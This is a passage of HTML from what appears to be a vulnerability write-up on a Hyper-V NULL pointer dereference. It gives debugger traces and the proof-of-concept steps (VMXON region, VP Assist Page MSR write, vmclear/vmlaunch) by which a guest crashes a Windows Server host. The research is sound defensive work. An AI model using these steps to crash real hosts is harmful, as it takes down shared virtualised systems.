pre-wrap;">02 00000100`00803d60 fffff982`efc82729 hv+0x2fd74f</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">03 00000100`00803d90 fffff982`efc1691f hv+0x282729</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">04 00000100`00803df0 fffff982`efc1816b hv+0x21691f</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">05 00000100`00803e80 fffff982`efc8c571 hv+0x21816b</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">06 00000100`00803fc0 00000000`00000000 hv+0x28c571</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2: kd> r</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rax=ffffe802c560d000 rbx=ffffe802c5607050 rcx=ffffe802c5608d00</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rdx=0000000000000000 rsi=0000000000000000 rdi=ffffe802c5608000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rip=fffff982efc7747e rsp=0000010000803d08 rbp=0000000000000014</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> r8=0000000000000000 r9=0000000000000000 r10=0000000000000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r11=0000000000000014 r12=0000000000000000 r13=ffffe802c56078d0</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r14=ffffe802c5608d00 r15=ffffe802c5607630</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">iopl=0 nv up di pl zr na po nc</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cs=0010 ss=0020 ds=0020 es=0020 fs=0020 gs=0020 efl=00010046</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hv+0x27747e:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">fffff982`efc7747e 384249 </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cmp byte ptr [rdx+49h],al ds:0020:00000000`00000049</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">=??</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows Server 2019 generates crash dump:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="173" src="https://lh6.googleusercontent.com/Oq8gYrusi3TepGHCsT6KWiWqbQnTuyCm0G41Yv6i1x64Pxhp3xIymYjPCtpC6nIY1nToI7jJqOOEBGnpwcfeKzN5flVqZdxv2SuGefJiI5oE7ZCPcPxHnw0MPbpRS7MiGX8hXEidim7NiQrncg" style="margin-left: 0px; margin-top: 0px;" width="491" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="86" src="https://lh6.googleusercontent.com/Ydr8LWZYc4AltV5hkviHY4Qny-OpiTAr8p-gcmtVpnhtDiXXNf0wwWzw7-NGOEOXEIV6_Cs2TJpeeCgo8zSTdXun_JsbfrItvtu-VvdfkBNiycUEmjVDTpO9gCyklP_8PkUqNlNdl_pV6Il26w" style="margin-left: 0px; margin-top: 0px;" width="551" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Exploit source code is present for Intel CPU only (technically exploit must works on AMD platform too, but no pc with such CPU around). Described shortly:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Activate VMX feature in guest OS (Next command in host OS must be executed for supporting: </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">);</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allocate and activate VMXON region;</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allocate VP Assist Page;</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Get physical address of VP Assist Page and write it to </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> msr; </span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Execute </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmclear</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, then </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmlaunch</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and get BSOD.</span></p></li></ol><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: center;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Vulnerability internals</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When instruction </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cmp byte ptr [rdx+49h],al</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is executed, </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rdx</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> contains 0, and we get access to zero pointer. It is simply NULL pointer dereference, but </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">rdx</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is not controlled from guest OS address space.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="118" src="https://lh4.googleusercontent.com/XTWCCo90D7_EdZR5dJQXqPy3U8QOthzgGKKn0IdMAPiZwEav_j59TW-XFRGdmbs-ucQlSM7-wx5IUYweX3IhC7GHeAWj_yRAvwSVhWxSu4cXjG1c5hMEPAZPpxU9zdiWj3MFuuRkfcOSrLjxYw" style="margin-left: 0px; margin-top: 0px;" width="217" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There is no symbols for hvix64.exe, therefore procedures have BSOD-related functionality names with level call index, nearest level is 1. That code blocks prepared all necessary for </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmlaunch</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instruction execution in hypervisor context.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When is this block executed?</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Caller block L2 is not interesting</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="181" src="https://lh5.googleusercontent.com/T2aeMX-5qe3KVLsaSZLxib7X6T82jtEF7FO7bAdnKHW1hdKUzegPlJSXaozWRB2o4Ez2qK_TV-LXrhrfSde-h1p89bEpXLahGaZdFeuVxhksqELX4ODy6EtwcAg76BWq2ZmEXoUbnmI0yhI9YA" style="margin-left: 0px; margin-top: 0px;" width="169" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">But next caller level is important. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="372" src="https://lh3.googleusercontent.com/s4m3eg7JyJ7vY4AYvZc5X9ZJhK4vcNwOEqYmTWasOA99bXYcIy1GITGTwRU6NRc_cDv5yUdLXwWr8-gDO-cT7ulCoRhmZoaDbn3VHa7PxycQZbc_1Q2QIzDfUb5ciMaKIlQjiI1tKr9lsCtBug" style="margin-left: 0px; margin-top: 0px;" width="255" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">How </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r8b</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is controlled?</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="117" src="https://lh4.googleusercontent.com/4ar3NEGDDCO2ne0pmzFQZ9ZHVzrlL44O8qDzsQQ4ifJzmQi9ax_K6bQK7EgxDnSMD7bQEGQg4Y5BDKyZb3fd65NP6rM-husp_iytqgtqpmczbrfo2Q-qPpyii226MqUdZ-3mnZVKqqy4opQqBw" style="margin-left: 0px; margin-top: 0px;" width="254" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When VP Assist Page is zeroed:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps poi(@rsi+198)+40</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608040 </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 – address of overlay VP Assist Page. Don’t changed after host OS reboot.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608048 00000000`000f000f</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608050 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608058 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c5608060 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps ffffe802`c561c000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c008 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c010 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c018 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c020 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c028 00000000`00000000 – rcx+28h</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c030 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">if rcx+28 != 0, then r8b = 1.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We can debug PoC driver in guest OS step-by-step and see physical and virtual addresses of variables, that are passed to hypervisor:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="334" src="https://lh5.googleusercontent.com/Uqa_Bh4tv1e0kFliVc78rmNp7FW2EjRdFod6fXEeu5nlZv2hoeU2H8XsXALYFV5FKHIeysrDZYSCG2XStduIckGNivLAV6k2K0NI-4AaD4wVeEsBGVYl-ngYTbeGqW8Z8G8RkVpgQDhoeHXoWw" style="margin-left: 0px; margin-top: 0px;" width="356" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="88" src="https://lh6.googleusercontent.com/gtVdIlaXu2pS05wqracu6e1nqc_MjDfTpyqDCJTpb3fZ9xNJDom8ap2S-OG90MH8ZqNXPbkYXxqUTTjGhZEzB4bWjSDUrK84E4FprA5PUCt_fTSD918QwuSoc6pJO0PrxahM3oR8nMYuMaPnCA" style="margin-left: 0px; margin-top: 0px;" width="553" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps ffffe802`c561c000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c008 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: 